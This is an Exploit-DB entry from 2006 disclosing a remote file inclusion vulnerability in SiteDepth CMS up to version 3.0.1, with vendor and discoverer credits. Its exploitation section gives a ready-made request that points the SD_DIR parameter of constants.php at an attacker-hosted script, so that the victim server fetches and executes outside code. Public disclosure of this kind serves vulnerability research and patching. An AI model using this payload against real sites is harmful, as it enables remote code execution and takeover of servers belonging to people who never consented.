SiteDepth CMS 3.0.1 - 'SD_DIR' Remote File Inclusion

EDB-ID:

2049


Platform:

PHP

Published:

2006-07-20

Title: SiteDepth CMS <= 3.0.1 - Remote File Include Vulnerability
------------------------------------------------------------------
Vendor: SiteDepth.com
URL: http://sitedepth.com
------------------------------------------------------------------
Credits:
Discovered by: "Aesthetico"
http://www.majorsecurity.de
------------------------------------------------------------------

Exploitation:
------------------------------------------------------------------
http://victim.com/constants.php?SD_DIR=http://www.yourspace.com/yourscript.php?

# milw0rm.com [2006-07-20]